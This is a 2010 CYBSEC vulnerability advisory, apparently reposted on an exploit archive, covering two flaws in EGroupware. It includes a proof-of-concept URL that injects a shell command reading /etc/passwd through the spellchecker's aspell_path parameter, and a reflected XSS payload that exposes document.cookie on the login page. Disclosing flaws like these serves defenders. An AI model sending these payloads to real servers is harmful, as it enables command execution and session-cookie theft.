EGroupware 1.6.002 / EGroupware Premium Line 9.1 Multiple Vulnerability

=========================================================================
EGroupware 1.6.002 / EGroupware Premium Line 9.1 Multiple Vulnerabilities
=========================================================================

Advisory Name: Remote Command Execution in EGroupware
 
Vulnerability Class: Remote Command Execution
 
Release Date: 2010-03-09
 
Affected Applications: Confirmed in EGroupware 1.4.001+.002 and 1.6.001+.002. EGroupware
 
Premium Line 9.1 and 9.2 is also affected. Other versions may also be affected.
 
Affected Platforms: Multiple
 
Local / Remote: Remote
 
Severity: High – CVSS: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
 
Researcher: Nahuel Grisol?a
 
Vendor Status: Acknowledged / Fixed.
 
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
 
Reference to CYBSEC Security Advisories: http://www.cybsec.com/EN/research/default.php
 
Vulnerability Description:
 
EGroupware is prone to a remote command execution vulnerability because the software fails to
adequately sanitize user-supplied input.
Successful attacks can compromise the affected software and possibly the computer running
EGroupware.
 
Proof of Concept:
 
http://server/egroupware/phpgwapi/js/fckeditor/editor/dialog/fck_spellerpages/spellerpages/serverscripts/
spellchecker.php?aspell_path=cat%20/etc/passwd%20%3E%20/tmp/passwd;
 
Parameter spellchecker_lang is also affected.
 
Impact:
 
Direct execution of arbitrary code in the context of Webserver user.
 
Solution: Fixed in EGroupware version 1.6.003, EPL-9.1.20100309 and EPL-9.2.20100309
 
Vendor Response:
 
Feb 5, 2010 - CYBSEC first notification
Feb 8, 2010 between Mar 7, 2010 – Multiple contacts.
Mar 9, 2010 – Vendor released fixed versions.
Mar 9, 2010 – Vulnerability is published.
 
Advisory Name: Reflected Cross-Site Scripting (XSS) in EGroupware
 
Vulnerability Class: Reflected Cross-Site Scripting (XSS)
 
Release Date: 2010-03-09
 
Affected Applications: Confirmed in EGroupware 1.4.001+.002 and 1.6.001+.002. EGroupware
Premium Line 9.1 and 9.2 is also affected. Other versions may also be affected.
 
Affected Platforms: Multiple
 
Local / Remote: Remote
 
Severity: Medium – CVSS: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
 
Researcher: Nahuel Grisol?a
 
Vendor Status: Acknowledged / Fixed.
 
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
 
Reference to CYBSEC Security Advisories: http://www.cybsec.com/EN/research/default.php
 
Vulnerability Description:
 
A reflected Cross Site Scripting vulnerability was found in EGroupware, because the application fails
to sanitize user-supplied input. The vulnerability can be triggered by any user.
 
Proof of Concept:
 
Working on Mozilla Firefox 3.5.7:
http://server/egroupware/login.php?
lang="%20style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px"%20onM
ouseOver="alert(document.cookie)
 
Impact:
 
An affected user may unintentionally execute scripts or actions written by an attacker. In addition, an
attacker may obtain authorization cookies that would allow him to gain unauthorized access to the
application.
 
Solution: Fixed in EGroupware version 1.6.003, EPL-9.1.20100309 and EPL-9.2.20100309
 
Vendor Response:
 
Feb 5, 2010 - CYBSEC first notification
Feb 8, 2010 between Mar 7, 2010 – Multiple contacts.
Mar 9, 2010 – Vendor released fixed versions.
Mar 9, 2010 – Vulnerability is published.



#  0day.today [2018-03-14]  #